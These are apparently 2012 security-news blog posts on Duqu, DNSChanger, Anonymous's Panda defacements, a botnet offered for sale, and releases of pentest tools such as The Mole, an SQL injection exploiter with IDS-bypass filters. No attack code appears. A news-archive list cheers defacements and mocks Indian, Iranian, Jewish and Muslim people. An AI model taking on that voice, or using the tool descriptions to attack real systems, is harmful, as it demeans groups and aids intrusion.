Bugtraq-I : Distribution for Pentesting and forensics

Bugtraq system offers the most comprehensive distribution, optimal, stable and automatic security to date. Bugtraq is a distribution based on the 2.6.38 kernel has a wide range of penetration and forensic tools. Bugtraq can be installed from a Live DVD or USB drive, the distribution is customized to the last package, configured and updated the kernel. The kernel has been patched for better performance to recognize a variety of hardware, including wireless injection patches pentesting that other distributions do not recognize.

Some of the special features that you can appreciate are:

· Administrative improvements of the system for better management of services.

· Expanded the range of recognition for injection wireless drivers.

· Patching the kernel 2.6.38 to recognize 4 gigs of RAM in 32-bit.

· Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...

· Unique Scripts from Bugtraq-Team (SVN updates tools, delete tracks, backdoors, Spyder-sql, etc.)

· Stability and performance optimized: Enhanced performance flash and java and start purging unnecessary services. So that the user can use only the services you really want.

· It has incorporated the creation of the user in the installation, which is created with all system configurations.

· We are the distribution and Forensic Pentesting with more tools built and functional, well organized menu without repetition of the same to avoid overwhelming the user.

Download Bugtraq-I

Duqu Trojan developed in unknown programming language

Researchers at Kaspersky have reached out for assistance after an investigation into the Duqu Trojan uncovered a section that is written in an unknown programming language.

The Russian security company says this new information could help them discover how the worm was able to communicate with its Command and Control (C&C) servers. The C&C servers essentially tell the worm what to do once it has accessed a system.

While the majority of Duqu is written in C++, the Framework was not and was not compiled with Microsoft’s Visual C++ 2008. Other languages ruled out include Python, Java, Objective C, Ada and Lua.“Given the size of the Duqu project, it’s possible that an entirely different team was responsible for creating the Duqu Framework as opposed to the team that created the drivers and wrote the system infection exploits,” said Alexander Gostev, chief security expert at Kaspersky Lab, in a statement.

The mysterious code could be the work of a separate collaborator, indiciating that multiple parties worked to develop the infection. Kaspersky is hoping that someone in the programming community will recognize it and come forward to identify it. Identification of the language could help analysts build a profile of DuQu’s authors, particularly if they can tie the language to a group of people known to use this specialized programming language or even to people who were behind its development.

Duqu first emerged in September 2011 and is thought to have been written by the same people behind the infamous Stuxnet worm, which targeted Iran's nuclear facilities and attempted to steal highly sensitive information. Duqu worked along the same lines; acting as a backdoor into a system to steal data.

Researchers have noted a number of similarities in the behaviour and spread of Duqu with the infamous Stuxnet malware, leading some researchers to dub Duqu as the successor to Stuxnet.

Albania is the most Malware infected Nation

Researchers at Security firms Norman and Microsoft Analyse data from their security products that Albania is the most Malware infected Nation, with 65% of scanned computers reporting infections. Rest Most Infected Countries are South Korea, Guatemala, Vietnam, Indonesia, Argentina, Thailand, Georgia, the Philippines, Algeria, Venezuela, Lithuania and Pakistan according to Norman Report.

Where as Microsoft also shows such reports that the most common category in Albania in Second quarter of 2011 was Worms, which affected 43.7 percent of all computers cleaned in Albania, down from 44.9 percent in First quarter of 2011.

The most common threat family in Albania in Second quarter of 2011 was Win32/Autorun, which affected 25.2 percent of computers cleaned in Albania. Win32/Autorun is a family of worms that spreads by copying itself to the mapped drives of an infected computer. The mapped drives may include network or removable drives.

The following table lists the top botnets actively sending spam from Albania. The top 3 spambots hosted in Albania during 2011:

	Botnet	% of all botnet IP addresses in Albania
1	Win32/Pramro	30.1%
2	Win32/Lethic	27.5%
3	Win32/Cutwail	16.8%

Other Reports shows that Finland has the lowest rate of infection in the world, with 24.31% of scanned computers containing a malware, such as a virus, spyware or trojan.

FBI get 4 more months to fight with DNSChanger

On March 5th, a US District Court (New York) signed an order to extend the March 8th deadline to July 9th.This extension will allow for all affected entities to continue to track-down and remediate agains hosts which are still compromised. Current data indicates that there are still several million infected/affected hosts world-wide dealing with this issue.

Over the last month, the temporary servers routed an average of 430,000 infected IP addresses according to the government request for extension. Security firm Internet Identity also found that at least 94 Fortune 500s and three major government agencies are still infected with DNSChanger. The remaining infected systems will now have an additional four months to get rid of the malware before having their DNS pulled.

The malware hijacked users clicks by modifying their computers' domain name system (DNS) settings to send URL requests to the criminals' own servers, a tactic that shunted victims to hacker-created sites that resembled the real domains.

It's estimated that DNSChanger generated close to $14 million in illicit advertising money via click hi-jacking and replacing online ads. The six individuals who were allegedly responsible for releasing the malware have been cleared for extradition by an Estonian court to face trial in the US.

"There has been significant progress within the government and enterprise, where it's easier to clean things up, but ISPs have been slower, in part because some of them are still trying to figure out how best to handle the situation," said Rasmussen, president and CTO at IID.

To find out whether your computer or network router is infected with DNSChanger malware, click here. If you are infected, make sure you've got a serious anti-virus security suite, update it and run a full system scan. If that doesn't work, contact a computer professional.

Also Read : FAQ : DNSChanger Trojan, Impact and Solutions

#AntiSec hackers deface Panda Security site to protest LulzSec arrests

Hackers aligned with Anonymous took credit on Wednesday for an attack on Panda Security's website shortly after charges were announced against five of the hacking collective's alleged members.

Over 25 websites related to Panda Security have been hacked tonight by Antisec. Emails and md5 passwords have leaked to public. Panda was accused by anonymous for helping the FBI to lurk anonymous members. The attacks are believed to be in retaliation for the recent arrests made by the FBI.

Yesterday biggest story of Hacking world exposed that, The world's most notorious computer hacker turned against his comrades because he did not want to go to prison and leave behind his two children. Monsegur, who has been described as the ringleader of LulzSec, and an 'influential member' of Anonymous, pleaded guilty to a dozen hacking-related charges last summer - crimes which carry a maximum sentence of 124 years and six months in prison.But, rather than face a lengthy jail sentence and not see his two children, the unemployed father agreed to cooperate with the FBI, and, ever since his arrest, has reportedly been working with them to bring down the groups' top hackers.

Charged Lulzsec Hackers are
Ryan Ackroyd a.k.a. Kayla, lol, lolsoon
Jake Davis a.k.a. topiary, atopiary
Darren Martyn a.k.a. pwnsauce, raepsauce, networkkitten
Donncha O'Cearrbhail a.k.a. palladium
Hector Xavier Monsegur a.k.a. Sabu, Xavier DeLeon, Leon
Jeremy Hammond a.k.a. Anarchaos, sup_g, burn, yohoho, POW, tylerknowsthis, crediblethreat

List of Defaced Sites :

1. cybercrime.pandasecurity.com
2. antivirus-offers.pandasecurity.com
3. blog.cloudantivirus.com
4. cloudofficeprotection.pandasecurity.com
5. cloud.pandasecurity.com
6. cloudpartnercenter.pandasecurity.com
7. cloudprotectionbeta.pandasecurity.com.tar.gz
8. cloudprotection.pandasecurity.com
9. facebookfriends.pandasecurity.com
10. forgetsecurity.co.uk
11. forgetsecurity.co.za
12. forgetsecurity.es
13. go.pandasecurity.com
14. info.pandasecurity.com
15. information.pandasecurity.com
16. lavuelta.pandasecurity.com
17. maintenance.pandasecurity.com
18. momentos.pandasecurity.com
19. ondersteuning.pandasecurity.com
20. pandacompetition.pandasecurity.com
21. pandalabs.pandasecurity.com
22. prensa.pandasecurity.com
23. press.pandasecurity.com
24. promo.pandasecurity.com
25. protectyourfamily.pandasecurity.com
26. research.pandasecurity.com
27. securitytothecloud.pandasecurity.com
28. serviciospro.pandasecurity.com
29. servicos.pandasecurity.com
30. suporte.pandasecurity.com
31. techcenter.pandasecurity.com
32. uninstall.cloudantivirus.com
33. wiki.cloudantivirus.com
34. www.cnccs.es
35. www.forgetsecurity.de

"Pandasecurity.com, better known for its shitty ANTIVIRUS WE HAVE BACKDOORED, has earning money working with Law Enforcement to lurk and snitch on anonymous activists. they helped to jail 25 anonymous in different countries...yep we know about you. How does it feel to be the spied one?"

In August, 2011, it came to light that Anonymous had hacked into 70 law enforcement websites, mostly local sheriffs’ websites in Missouri.The hacks had occurred four weeks before they were discovered. Using information passed on by Monsegur, the FBI was able to work with the server company to mitigate the damage. The FBI then alerted 300 government, financial and corporate entities around the world to potential vulnerabilities in their computer systems.

AntiSec also voiced support for those fighting for their freedom in Tunisia, Egypt, Libya, Syria, Bahrain, Yemen, and Iran.It also sent a dare to the FBI to get its members, saying, "we are waiting for you."

Rogue Antivirus advertised on 200000 hacked Web pages

The Websense has detected a new wave of mass-injections of a well-known rogue antivirus campaign, a new mass injection attack has infected over 200,000 Web pages, amounting to close to 30,000 unique Web hosts.

The attack uses SQL injection techniques to insert a rogue script element. Users who land on one of the compromised pages get redirected through several domains and finally land on a scareware site. These sites mimic antivirus scans and tell visitors their computers are infected with malware in an attempt to convince them to download fake security programs. The programs display even more false warnings and ask users to pay for a license in order to clean their machines.

The page looks like a Windows Explorer window with a "Windows Security Alert" dialogue box in it. The fake antivirus then prompts visitors to download and run their "antivirus tool" to remove the supposedly found Trojans. The executable is itself the Trojan.

More than 85% of the compromised website are located in the United States. This doesn’t mean that only US internauts are exposed to this threat, the sites being also visited by individuals from Turkey, Brazil, UK, India, China, South Africa, Jordan, Canada, Philippines and Taiwan.

Mass injection attacks are a common malware infection vector. The hackers exploit the trust users associate with the infected sites in order to push scareware or launch drive-by downloads. In other circumstances, the search engine rank of compromised sites can be exploited to poison search results for popular keywords with malicious links in what is known as black hat SEO attacks.

DarkComet RAT Remover Released

The civil war in Syria rages not only on the ground but also on internet. The opposition has made increasing use of platforms such as Facebook to organize and spread their message. In response the regime have tried to disrupt these activities by defacing websites and spamming Facebook pages.
he regime is using the DarkComet RAT (called Backdoor:Win32/Fynloski.A by Microsoft) to spy on their own people.The creator of the DarkComet RAT was disgusted by that behaviour and now has retaliated with a specially created tool to detect and remove his own DarkComet RAT to help the oppressed Syrian people, DarkComet RAT Remover.

DarkComet RAT Remover will detect any kind of instance of darkcomet running in memory even if an hacker try to obfuscate the loader to be undetected by common Antivirus softwares, also it detects registry threats and keyloggers logs.

Features:

[+] Detect DarkComet Even if crypted.

[+] Detect DarkComet Even if visualized.

[+] Detect DarkComet Even if injected in a remote process.

[+] Detect DarkComet Even if Protected / Packed.

[+] Detect Registry Changes by DarkComet.

[+] Detect Keylogger logs.

Download DarkComet RAT Remover

#Security Alert : Facebook Two-Factor Authentication fail !

Last year Facebook has launched a security feature called Login Approvals or two-factor authentication. This is a follow-up security update regarding Facebook Login from Facebook. They have already integrated Facebook login email alerts to get notification emails or SMS messages whenever a suspicious person uses your Facebook account from a different location.

Christopher Lowson, on his blog explains the Facebook Two-Factor Authentication, which is really another biggest fail of Facebook Security.

But that feature is not enough to ensure your account’s security and that is why Facebook has launched “Login Approvals“. This feature is very similar with Google 2-step verification which associates a mobile device with your Facebook account and authenticates the login by sending a verification code at your mobile phone device.

According to this feature, When user will logging into your Facebook account from a new device, a code will be sent to his phone which he will have to enter before he is granted access to your Facebook Account.

What Lowson did, He click the option “I can’t get my code” and noticed “Skip this and stop asking me to enter codes” and After clicking this he got asked “Log in without entering codes from now on?” by Facebook. Finally Lowson is able to login without Codes and 2 step authentication Security feature Turned off and Bypassed simply by options.

Conclusion is that, Why Facebook is trying to use such security features which can be easily exploited at user end ? Even a very less percentage of facebook users are aware about this feature which is actually implemented last year and still have such bugs.

THOR : Another P2P Botnet in development with extra stealth features

The research community is now focusing on the integration of peer-to-peer (P2P) concepts as incremental improvements to distributed malicious software networks (now generically referred to as botnets). Because “botnets” can be used for illicit financial gain,they have become quite popular in recent Internet attacks.

A “botnet” is a network of computers that are compromised and controlled by an attacker. Each computer is infected witha malicious program called a “bot”, which actively communicates with other bots in the botnet or with several “botcontrollers” to receive commands from the botnet owner. Attackers maintain complete control of their botnets, andcan conduct Distributed Denial-of-Service (DDoS) attacks,email spamming, keylogging, abusing online advertisements, spreading new malware, etc.

However, the first botnets that use peer-to-peer (P2P) networks for remote control of the compromised machines appeared in the wild recently. This new bot has a different code base, it uses the same spreading strategy and also seems to maintain a multi-relay (or peer-to-peer) infrastructure just like its predecessor.

Thor is a decentralised P2P botnet , Coded in C / C++ & Developed by "TheGrimReap3r" that has been in development for some time now and is almost ready to go out on sale.The botnet itself has no central command point, so it will be very difficult to shut down, also, very difficult to track where commands are coming from, because all the nodes pass them on.

Thor uses DLL injection, IAT hooking, ring3 rootkit amongst other things to hide. One more interesting Feature that It have it's own module system so you can write your own modules with our easy API system. It include peer to peer communication uses 256-AES encryption with random key generation at each startup.

Thor works on Win 2000+, Win XP SP0/SP1/SP2/SP3, Win Vista SP0/SP1/SP2, Win 7 SP0/SP1 and Support x86 and x64 systems.

The Developers of Thor going to sale this Botnet openly in underground market and various hacking forums at $8000, the package without modules and the expected modules that anyone can buy will be: advanced botkiller, DDoS, formgrabber, keylogger/password stealer and mass mailer.

Hackers steal Michael Jackson's entire back catalog from Sony

Entertainment giant Sony has confirmed that hackers accessed its systems and compromised Michael Jackson's entire back catalogue, including many unreleased songs. Michael Jackson's entire back catalogue has been stolen by Internet hackers.

Sony music suffered its second major security breach in a year, with thieves targeting songs and unreleased material by the superstar singer. It's alleged they downloaded more than 50,000 music files worth $253 million in the biggest ever cyberattack on a music company.The news comes just a year after Sony paid $395 million for the seven-year rights to the songs following Jacko's death.

The buy-up came with a stash of unreleased tracks including duets Jacko did with the late Queen singer FreddieMercury and Black Eyed Peas star will.i.am, 36. Sony had been planning to release them on up to 10 albums, which would have netted a fortune.

It is thought that the hack occurred around the same time Sony's PlayStation Network (PSN) was hacked in April 2011 but was not noticed at the time. It is thought that the breach was only noticed through monitoring of social networks and Michael Jackson fan sites."Everything Sony purchased from the Michael Jackson estate was compromised," a source told. "It caused them to check their systems and they found the breach. There was a degree of sophistication. Sony identified the weakness and plugged the gap."

The hack has compromised the work of other artists managed by the firm, including songs by Jimi Hendrix, Paul Simon, Olly Murs, the Foo Fighters and Avril Lavigne. Two men appeared in court in the UK on Friday accused of offences in connection with the alleged security breach.James Marks, 26, and James McCormick, 25, denied charges under the Computer Misuse Act and the Copyright, Designs and Patents Act and were bailed. They are due to stand trial next January.

It's unclear who stole the recordings, and if it was the same attackers responsible for the massive PlayStation breach which compromised the accounts of millions of Sony customers. So far, it appears as though the recordings have not been leaked to the Internet, but it's possible that could happen unless the hacker just plans to keep them for his or her own listening enjoyment.

The Mole v0.3 Released : Automatic SQL Injection Exploitation Tool

Nasel has just released the new version of The Mole, an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.

This release has introduced new features compared with the previous one, among these you can find that The Mole is now able to exploit injections thourgh cookie parameters. A new promising feature is that now you can exploit injections that return binary data, to achieve this the mole uses uses HEAD requests and analyzes the headers received (the size of the binary to download usually differs when the query was successful or not) and does not need to download the full binary data.

In this release there has been a major change in the The Mole's architecture, and now allows to easily insert filters in order to bypass IPS/IDS rules or modify the query on runtime. You can see a tutorial on how to write these filters in the tutorial section of the tool's site.

Feature:

• Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
• Command line interface. Different commands trigger different actions.
• Auto-completion for commands, command arguments and database, table and columns names.
• Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
• Exploits SQL Injections through GET/POST/Cookie parameters.
• Developed in python 3.
• Exploits SQL Injections that return binary data.
• Powerful command interpreter to simplify its usage.

Download The Mole v0.3

Tutorial link: Tutorial

FOCA PRO 3.1 and MetaShield Protector Released

Forensic FOCA

New latest version of FOCA announced today, in this case a Forensic FOCA. This tool is specially created for forensic analyst, allowing them to crawl metadata from files and to create a powerful time-line of metadata.

This information lets you to reconstruct what happen in a machine just analyzing what documents were created between two dates, or what files where created by one user in a period of time, or what users where working in one single machine at one single day.

The tool allows to export all the data, even with the hash of the files, to XML reports, that can be easily integrated in any other reporting system. License of Forensic FOCA is only 20 € per year, and you can buy it on line or test the trial version.

More info at: http://www.informatica64.com/ForensicFOCA/

New FOCA PRO with Plugins

FOCA got new version of FOCA PRO with plugin support. Right now FOCA PRO comes with a set of plugins to analyze .SVN/Entries files, a web fuzzer and a MySQL Injector to expand the FOCA powers.

If you attended an Online Seminar in the last year, you will receive an e-mail within this week, with the link and license to get the new FOCA PRO 3.1. If you want to play with this new powerful FOCA PRO, then you can register for the next online training and get it.

You can download free version from http://www.informatica64.com/foca.aspx and that you have an online version to extract metadata from files from http://www.informatica64.com/foca/

MetaShield Protector

The last reminder is for our solution to clean up metadata from files published in web servers running Microsoft IIS. MetaShield Protector is a plugin that allows you to configure a secure policy of metadata in the documents you are serving from your webserver.

http://www.metashieldprotector.com/

GitHub hacked with Ruby on Rails public key vulnerability

Github, the service that many professional programmers use to store their work and collaborate on coding, was hacked over the weekend. A young Russian developer Egor Homakov exploited a gaping vulnerability in GitHub that allowed him (or anyone else with basic hacker know-how) to gain administrator access to projects such as Ruby on Rails, Linux, and millions of others.

When Github saw what happened, they suspended Homakov’s account, which created a firestorm of protest. A blog post entitled, Github, You Have Let Us All Down . Github has succumbed to a public key vulnerability in Ruby on Rails allowing a user administrator access to the popular Rails Git. Homakov's actions were relatively simple - he merely uploaded his public key to the repository so Git thought he was an approved administrator of that project. This would not only entitle Homakov to commit files but he could effectively wipe the entire project and its history clean.

"The root cause of the vulnerability was a failure to properly check incoming form parameters, a problem known as the mass-assignment vulnerability," GitHub co-founder Tom Preston-Werner wrote in a blog post.

"Two days ago he responsibly disclosed a security vulnerability to us and we worked with him to fix it in a timely fashion. Today, he found and exploited the public key form update vulnerability without responsible disclosure," Preston-Werner said, explaining that this had meant Homakov had broken GitHub's terms and conditions.

Github is used by a number of high-profile projects including the Linux kernel. Homakev's actions were to exploit a well known weakness of Ruby on Rails and questions might be asked as to why Github's administrators did not block such an attack sooner.

Moving forward, GitHub has apologized for obfuscating the how white hat hackers should disclose security vulnerabilities and set up a new help page that clearly lists how to report issues.

BackTrack 5 R2 Released, New Kernel, New Tools

Hacker are your Ready ? Backtrack 5 R2 finally released with bug fixes, upgrades, and the addition of 42 new tools. With the best custom-built 3.2.6 kernel, the best wireless support available at maximum speed. This release have included Metasploit 4.2.0 Community Edition, version 3.0 of the Social Engineer Toolkit, BeEF 0.4.3.2, and many other tool upgrades.

Backtrack also added the following new tools to R2:

• arduino
• bluelog
• bt-audit
• dirb
• dnschef
• dpscan
• easy-creds
• extundelete
• findmyhash
• golismero
• goofile
• hashcat-gui
• hash-identifier
• hexorbase
• horst
• hotpatch
• joomscan
• killerbee
• libhijack
• magictree
• nipper-ng
• patator
• pipal
• pyrit
• reaver
• rebind
• rec-studio
• redfang
• se-toolkit
• sqlsus
• sslyze
• sucrack
• thc-ssl-dos
• tlssled
• uniscan
• vega
• watobo
• wcex
• wol-e
• xspy
Along with this, Backtrack added Wiki about Building a Pyrit Cluster, Creating a John the Ripper Cluster, Enabling PAE in BT5 R2 and Installing VMware Player on there page Read Here

Download Backtrack 5 R2

#THN Monthly ( February ) News Archive,If you miss Something !

# Censorship - Global Concern, THN Magazine March Edition : http://goo.gl/bktRz

# Forget terrorists attacks here are 2012's Most Vulnerable Cities At Risk for Cyber Crime (Idiots) : http://goo.gl/4VYGf

# Slum Dog India demands Real time monitoring on Indian Gmail & Yahoo Emails. Do they really have nothing better to do? http://goo.gl/iYO5H

# Iran will probably drop nuclear development cause they think they need to Develop their own security Software, No more foreign Solution, they might suggest banning the Burka too! : http://goo.gl/QVheH

# Three Greek Anonymous hackers arrested for defacing Government Sites. They couldn't make the street protest! : http://goo.gl/EyMux

# Facebook Hacking - Student jailed for eight months. They ought to jail Facebook for having such a stupid site : http://goo.gl/PwkHt

# FAQ : DNSChanger Trojan, Impact and Solutions : http://goo.gl/IE2Qh

# How Hackers can Track your Mobile phone with a cheap setup ? http://goo.gl/YxyKK

# Anonymous does the work of angels and defaces National Consumer and Federal Trade Commission sites against #ACTA : http://goo.gl/H4Bc8

# Tor Bridge Relay to Bypass Internet Censorship : http://goo.gl/PqVG8

# Dangerous IE browser vulnerabilities, Allows remote code execution ! http://goo.gl/31n5N

# Anonymous Hackers take stock and target Nasdaq website http://goo.gl/XeNUz

# Anonymous shows a cyber army is better than any other and leaks 400 Mb Documents from US Army Intelligence Knowledge Network http://goo.gl/KL2L3

# Microsoft Store India got hacked in India ! : http://goo.gl/87HUp

# "NASA Own3d Again" - NASA Database Leaked by r00tw0rm http://goo.gl/skmUQ

# Cia.gov Tango Down - #FuckFBIFriday by Anonymous. Anonymous reports it was one of the best fucks they ever had! : http://goo.gl/dF7av

# Because Iran is sooooo very democratic they Shutdown Google ,Yahoo & other Major sites using Https Protocol : http://goo.gl/H1Ntv

# Apple Supplier Foxconn’s Servers Hacked, Exposing Vendor Usernames and Passwords : http://goo.gl/fbkba

# Arab Countries websites urged to Increase Security Against Israeli Hackers and stop importing Challah bread : http://goo.gl/ZozkE

# Cryptographers : Satellite phones vulnerable to eavesdropping http://goo.gl/2aB0S

# Anonymous Hack Syrian President's Emails with Password "12345" they knew that cause he can't count higher than that : http://goo.gl/WBNFV

# YamaTough Hacker Demanded $50,000 for not releasing Stolen Symantec Source Code. Other Anons likely to hack him if he doesn't share http://goo.gl/9XqD1

# Citigroup sites hit by Brazilian Anonymous hacker #OpWeeksPayment http://goo.gl/1NO32

# Anonymous Hacks FBI and Records Conference Call. Confirms FBI stands for Fools Bastards & Idiots : http://goo.gl/ZGw4A

# NASA and Pentagon Hacker - TinKode Arrested in Romania http://goo.gl/Kw00L

# FBI will Monitor Social Media using Crawl Application. Since they can't crawl out of a paper bag we won't get too worried : http://goo.gl/hiff8

# CBS Broadcasting Hacked by Anonymous Hackers for #OpMegaUpload http://goo.gl/wyb6m

# Brazil Under Anonymous Attack - Tangara da Serra city site defaced ! I guess they are mad we named a body waxing after them http://goo.gl/QNoGj

# Woohooo! After #SopaBlackout, Congress Postpones Action on #SOPA, #PIPA : http://goo.gl/Oz4nR

# Tit for Tat - Anonymous Hackers Brings Down FBI website for #OpMegaupload. Apparently Anonymous loves a good you know what : http://goo.gl/nbhpT

# SOPA in US and Censorship in India: A cocktail to destroy Internet Freedom ! Idiots! : http://goo.gl/OQQiC

# Cyber War : Another 7000 Israel credit cards Exposed on Internet. Apparently the hackers wanted to see where the good Hanukkah shopping was : http://goo.gl/xHuX5

# Saudi hackers target Israeli stock exchange and National air carrier, mad because they didn't get a Hanukkah present : http://goo.gl/6Ayz7

Sandcat Browser 2.0 Released, Penetration Testing Oriented Browser

Sandcat Browser version 2.0 includes several user interface and experience improvements, an improved extension system, RudraScript support and new extensions.

What is Sandcat Browser?

The fastest web browser combined with the fastest scripting language packed with features for pen-testers. Sandcat Browser is a freeware portable pen-test oriented multi-tabbed web browser with extensions support developed by the Syhunt team, the same creators of the Sandcat web application security scanner. The Sandcat Browser is built on top of Chromium, the same engine that powers the Google Chrome browser, and uses the Lua language to provide extensions and scripting support.

This first Sandcat Browser release includes the following pen-test oriented features:

• Live HTTP Headers
• Request Editor extension
• Fuzzer extension with multiple modes and support for filters
• JavaScript Executor extension -- allows you to load and run external JavaScript files
• Lua Executor extension -- allows you to load and run external Lua scripts
• Syhunt Gelo
• HTTP Brute Force, CGI Scanner scripts and more.

User Interface & Experience Enhancements

• New windows will now open in new Tabs.
• Navigation bar now behaves like Firefox's or Opera's.
• Improved multi-tab support.
• Improved source tab.
• Added a simple cookie logging extension.

Sandcat Browser Extension Development Kit

The Sandcat Browser Extension Development Kit is now available here. It also includes the source of all the Sandcat Browser extensions.

Added RudraScript

Syhunt RudraScript allows you to easily execute code in JavaScript, PascalScript, Perl, PHP, Python, Ruby & VBScript from within the browser and the browser extensions. Details about the RudraScript support can be found at this link

Download Sandcat Browser 2.0

The Killswitch : They can remotely modify your Window 8

Last year,a Finnish software developer, was cruising Google’s Android Market for smartphone apps last year when he noticed something strange. Dozens of best-selling applications suddenly listed the same wrong publisher. Google uses a little known kill switch, to forcibly removing the malicious code from more than 250,000 infected Android smartphones. It’s a powerful way to stop threats that spread quickly, but it’s also a privacy and security land mine.

With the rollout of the Windows 8 operating system expected later this year, millions of desktop and laptop PCs will get kill switches for the first time. Microsoft has confirmed that they have remote kill switch installed in to Windows 8 apps. using this access, they can disable and even remove an app entirely from a user’s device. This piece of information was released along with other details of the upcoming Windows Store for Windows 8.

Anyone worried about Microsoft having complete access to your computer can rest easy for now. The company has stated that they can only “kill” programs downloaded from its new Microsoft App Store. This is what the company has to say about it in official terms: -“In cases where your security is at risk, or where we’re required to do so for legal reasons, you may not be able to run apps or access content that you previously acquired or purchased a license for,”.

Any software loaded from a flash drive, DVD, or directly from the Web will remain outside Microsoft’s control. Still, the kill switch is a tool that could help Microsoft prevent mass malware infections. “For most users, the ability to remotely remove apps is a good thing,” says Charlie Miller, a researcher with the security company Accuvant.

Hiroshi Lockheimer, Google’s vice president of Android engineering, says the search company reserves the use of the kill switch for “really egregious, really obvious cases” of harmful content. Microsoft’s Biggs says the company has used the functionality in its smartphones only for “technical issues and content issues.” Apple declined to comment. Amazon did not respond to several messages.

Nonetheless, a “kill switch” for curators of online applications marketplace is common as companies try to protect users of the platforms they develop from malware or hacking attempts implemented through applications.Microsoft’s upcoming Windows 8 operating system is expected to be launched by the middle of next year.

$60000 for Exploiting Google Chrome, Hackers at Pwnium work...

Google has offered prizes, totalling $1 million, to those who successfully hack the Google Chrome browser at the Pwn2Own hacker contest taking place next week i.e 7 March 2012. Chrome is the only browser in the contest's six year history to not be exploited like at all.

Therefore Google will hand out prizes of $60,000, $40,000, and $20,000 for contestants able to remotely commandeer a fully-patched browser running on Windows 7. Finding a "Full Chrome Exploit," obtaining user account persistence using only bugs in the browser itself will net the $60k prize. Using webkits, flash, or a driver-based exploit can only earn the lesser amounts.

Prizes will be awarded on a first-come-first-serve basis, until the entire $1 million has been claimed. “While we’re proud of Chrome’s leading track record in past competitions, the fact is that not receiving exploits means that it’s harder to learn and improve,” said Chris Evans and Justin Schuh, members of the Google Chrome security team.

“To maximize our chances of receiving exploits this year, we’ve upped the ante. We will directly sponsor up to $1 million worth of rewards.” Pwn2Own isn’t the only time researchers can be paid for digging up security flaws in Chrome. Like other companies including Mozilla and Facebook, Google offers “bug bounties” to researchers, and its flaw-buying program has given out more than $300,000 in payments over the last two years.

[Source]

Secunia PSI 3.0 : Automatic Patching Of Insecure Applications

Secunia Personal Software Inspector (PSI) is a free program that scans the system for programs that are installed in an outdated version.The developers have just released the first beta version of Secunia PSI 3.0 for Windows. A new version of the Personal Software Inspector (PSI) tool from vulnerability management firm Secunia automates the updating of third-party programs that don’t already have auto-updaters built-in.

When you start the program for the first time after installation, you are asked to run a scan on the system. Secunia compares the list of installed software with the latest versions stored in their database. A list of outdated programs are then displayed in the program interface.

Though most software vendors release patches, its tedious for users to find these updates and download them, where Secunia inspector tool identifies vulnerable programs and plug-ins in your Computer, download and installs all the required patches to keep your Computer safe so that you can safely bank, shop and socialize online.

Secunia PSI 3.0 is compatible with all recent 32.bit and 64-bit editions of the Microsoft Windows operating system.

Download Secunia PSI 3.0 Beta

Irongeek's Shared hosting MD5 Change Detection Script

Adrian Crenshaw aka Irongeek just release another great tool for web admins that will monitor the files on a website, and report any changed via email. Actually "irongeek.com" was hacked few days back which is hosted on a shared hosting. There is an awesome article posted by him on his blog "How I Got Pwned: Lessons in Ghetto Incident Response". I think after that Adrian decide to make a handy tool/script to help web admins so that they can easily monitoring there files on a shared server.

This simple shell Script user can run on a shared server. Let suppose once hackers get into your website either by exploiting known vulnerabilities in any of the installed programs OR by getting FTP access to your server, the first thing they usually do is to plant backdoor scripts to log them in again at a later date. They need some executable script on the server to gain access to MySQL passwords, installation passwords or even edit settings in your wordpress or other installations. We have also seen situations where the site was left largely unchanged except for malicious javascript code added to the bottom of the index.php or index.html files.

The problem is that we dont even have an idea that our site is hacked until it is too late or too embrassing. Irongeek write a script , that will run on the server and will detects any changes or to any executable file on the server or any new file on the server from HTML, JS, to PHP, ASP, Perl, Python files etc. It will generate a hash value of all our files and then compare them periodically, then we will be able to detect when our codebase has changed on the server.

A cron job can be setup to run the web server, compare the results with the last known valid hash and send out an email alert. Another similar tool was released by Dave Kennedy named "Artillery" for confusing hackers and protection tool for Linux.

Download the Script